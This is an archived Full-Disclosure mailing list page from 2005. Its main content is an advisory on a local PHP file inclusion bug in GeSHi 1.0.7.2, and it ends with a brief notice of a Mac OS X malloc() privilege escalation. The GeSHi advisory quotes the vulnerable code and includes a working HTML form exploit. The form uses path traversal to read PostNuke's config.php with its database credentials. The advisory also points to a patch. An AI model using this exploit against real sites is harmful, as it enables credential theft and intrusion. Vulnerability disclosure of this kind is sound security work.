lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Sun Sep 25 12:56:47 2005
From: max at jestsuper.pl (Maksymilian Arciemowicz)
Subject: GeSHi Local PHP file inclusion 1.0.7.2

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[GeSHi Local PHP file inclusion 1.0.7.2]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).17
Date: 21.9.2005
from SECURITYREASON.COM

- --- 0.Description ---

GeSHi started as a mod for the phpBB forum system, to enable highlighting of 
more languages than the available (which was 0 ;)). However, it quickly 
spawned into an entire project on its own. But now it has been released, work 
continues on a mod for phpBB - and hopefully for many forum systems, blogs 
and other web-based systems.

Several systems are using GeSHi now, including:

PostNuke - A popular open source CMS
Docuwiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evovling CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in Wikis
TikiWiki - A megapowerful Wiki/CMS, and one I personally use
RWeb - A site-building tool


- --- 1. Local (PHP) file inclusion ---
I have found one bug in file ./contrib/example.php
This file exists in standart packet GeSHi.
In file:

- -10-18-line---
include('../geshi.php');
if ( isset($_POST['submit']) )
{
	if ( get_magic_quotes_gpc() ) $_POST['source'] = 
stripslashes($_POST['source']);
	if ( !strlen(trim($_POST['source'])) )
	{
		$_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] . 
'.php'));
		$_POST['language'] = 'php';
	}
- -10-18-line---

Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can 
read any php file
(for example in postnuke -config.php-).
You need use varible $_POST['language'] wher is path to php file. 
I have tested this bug in GeSHi package and in PostNuke 0.760.

PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)

We can read config.php in PostNuke where we have login, password, dbname and 
dbhost.
All variables needed to log in to database.
So we can just use this exploit below : 

- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---
<center><a href="http://securityreason.com" 
target="http://securityreason.com/"><img 
src="http://securityreason.com/gfx/small_logo.png"></a><p>
<form action="http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php" 
method="post">
Path to file:<br>
example: <b>../../../../config</b><br>
<textarea name="language"></textarea><br>
<input type="submit" name="submit" value="See">
</form>
- --- EXPLOIT FOR POSTNUKE 0.760 ---

[HOST] = example. http://www.securityreason.com/postnuke/html
any questions? ;]

- --- 2. How to fix ---
Patch
http://securityreason.com/patch/2
works in PostNuke 0.760

or new version of script 1.0.7.3

- --- 3. Greets ---

sp3x

- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDMuOr3Ke13X/fTO4RAtIPAJ9eYAoID8idUKarOBdV2ndLcy0VPgCgmvIm
MWVTap2Adcne2IMt7OpZHmM=
=JulS
-----END PGP SIGNATURE-----
From bogus@...s.not.exist.com  Sun Sep 25 13:34:26 2005
From: bogus@...s.not.exist.com ()
Date: Sun Sep 25 13:34:39 2005
Subject: [Full-disclosure] Mac OS X - malloc() local privilege escalation
	vulnerability.
Message-ID: <5F6E6AF1-FB25-4985-89E0-2E6DE0B7ADB8@...esec.org>

Suresec Security Advisory - #00007

25/09/2005



Mac OS X - malloc() insecure use of environment variable.
Advisory: http://www.suresec.org/advisories/adv7.pdf

Description:

The malloc() function on Mac OS X insecurely trusts a debug variable,  
regardless of the fact that the calling application may be suid root.

This can result in an arbitrary file being overwritten, which can be  
used to escalate privileges.

This vulnerability was discovered by Ilja van Sprundel. 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050925/4fd5a9b8/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ